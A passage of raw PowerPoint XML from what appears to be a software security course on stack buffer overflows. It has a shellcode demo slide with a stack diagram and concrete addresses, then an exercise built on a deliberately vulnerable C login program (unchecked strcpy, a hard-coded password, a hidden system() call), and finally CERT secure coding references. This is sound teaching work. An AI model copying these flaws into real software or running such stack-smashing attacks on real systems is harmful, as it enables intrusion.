              <a:ext cx="1368152" cy="3600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sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="投影片編號版面配置區 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}"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(11)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>run &lt; exploitsucc.bin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="群組 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="755576" y="2996952"/>
            <a:ext cx="8115134" cy="3456384"/>
            <a:chOff x="755576" y="2996952"/>
            <a:chExt cx="8115134" cy="3456384"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="圖片 6" descr="擷取選取區域_059.bmp"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="899592" y="2996952"/>
              <a:ext cx="7971118" cy="3456384"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="橢圓 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="755576" y="3861048"/>
              <a:ext cx="7056784" cy="576064"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="投影片編號版面配置區 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>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(12)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1628800"/>
            <a:ext cx="2242592" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>More detailed explanation</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="群組 20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1979712" y="2276872"/>
            <a:ext cx="7194167" cy="3888432"/>
            <a:chOff x="1979712" y="2276872"/>
            <a:chExt cx="7194167" cy="3888432"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="20" name="群組 3"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1979712" y="2348880"/>
              <a:ext cx="6192688" cy="3816424"/>
              <a:chOff x="1043608" y="2348880"/>
              <a:chExt cx="6192688" cy="3816424"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="矩形 4"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3131840" y="2348880"/>
                <a:ext cx="2088232"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131840" y="4581128"/>
                <a:ext cx="2088232"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Return address</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="矩形 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3131840" y="2348880"/>
                <a:ext cx="2088232" cy="1728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Password [12]</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>buffer</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="矩形 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5364088" y="2348880"/>
                <a:ext cx="1296144"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364088" y="5085184"/>
                <a:ext cx="1296144" cy="108012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2060"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Shellcode</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10" name="矩形 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5364088" y="4581128"/>
                <a:ext cx="1296144" cy="57606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2060"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Pointer</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="11" name="直線接點 10"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6588224" y="4869160"/>
                <a:ext cx="648072" cy="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7236296" y="4869160"/>
                <a:ext cx="0" cy="360040"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="698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H="1">
                <a:off x="6732240" y="5229200"/>
                <a:ext cx="504056" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">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2195736" y="2420888"/>
                <a:ext cx="86409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043608" y="2348880"/>
                <a:ext cx="1408527" cy="369332"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
                  <a:t>Stack Pointer</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="矩形 15"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5364088" y="2348880"/>
                <a:ext cx="1296144" cy="22322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2060"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Exceeding the size of the buffer</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="文字方塊 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7668344" y="2276872"/>
              <a:ext cx="1182118" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0xbffff1b4</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="文字方塊 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7668344" y="4509120"/>
              <a:ext cx="1134028" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0xbffff1cc</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="文字方塊 18"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7991761" y="5157192"/>
              <a:ext cx="1182118" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>0xbffff1d0</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="投影片編號版面配置區 20"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}"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en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Demo (13)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="2818656" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Practice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Write down the possible buffer overflow problems in this program (only observe it without using any analysis tools). You should explain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> these buffer overflow flaws can be exploited.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1026" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3419872" y="980728"/>
            <a:ext cx="504056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#include &lt;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stdio.h</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&gt;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#include &lt;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string.h</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&gt;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int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UPtest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(char *, char *);</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void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myprivatetest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(void);</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int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main(</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int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argc</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char**</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argv</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if(</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UPtest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argv</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[1],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argv</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printf</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("Access granted...\n");</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 else {</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printf</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("Wrong username and password!!!!\n");</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return 0;</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int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UPtest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(char *a1 , char *a2){</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char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Uname</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[10],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Upass</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[12];</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strcpy</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Uname</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a1);</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strcpy</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Upass</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a2);</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if(!</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strcmp</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Uname</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"Admin") &amp;&amp;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strcmp</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Upass</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"PassAd007"))</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return 1;</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else</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     return 0;</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void </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myprivatetest</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printf</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("This is test code to run other system program.\n");</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system("/</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usr</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/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>xeyes</a:t>
            </a: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a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-TW" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="投影片編號版面配置區 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>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Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Demo (14)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4997152"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Apply some tools such as GDB to do the stack smashing attack under the operation systems of Windows or Linux. Note that you may disable some protections by OS or compilers to make your attack successful. You should write down the detail steps for your attack process.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Modify this program to avoid the buffer overflow attack and other possible threats you found. You should explain your resolving method.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Create a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> for  the program to execute an arbitrary function, such as /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/bin/cal in the Linux system (may be under GDB) . You should illustrate how to find the function return address and change it to execute your designed malicious code. Again, you may disable some protections by OS or compilers to make your attack successful.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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57</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW"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64704"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>CERT – Secure Coding Standards (1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="836712"/>
            <a:ext cx="8229600" cy="2404863"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>CERT – secure coding standards </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.securecoding.cert.org/confluence/display/seccode/CERT+Secure+Coding+Standards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>This web site exists to support the development of secure coding standards for commonly used programming languages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>such as C, C++, Java, and Perl.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> These standards are being developed through a broad-based community effort including the CERT Secure Coding Initiative and members of the software development and software security communities.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1907704" y="3140968"/>
            <a:ext cx="6281192" cy="3500150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="投影片編號版面配置區 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW"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CERT – Secure Coding Standards (2)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The reference books</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The CERT C Secure Coding Standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The CERT Oracle Secure Coding Standard for Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>The CERT Perl Secure Coding Standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 6" descr="CERT C Secure Coding Standard, The">
            <a:hlinkClick r:id=""/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1331640" y="3789040"/>
            <a:ext cx="2088232" cy="2766909"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2056" name="Picture 8" descr="CERT Oracle Secure Coding Standard for Java, The">
            <a:hlinkClick r:id=""/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3707904" y="3717032"/>
            <a:ext cx="2160240" cy="2835316"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="投影片編號版面配置區 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DDF26525-081F-4A1F-B92B-C5DAB6680A3D}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>59</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Parsing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A language parser uses a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
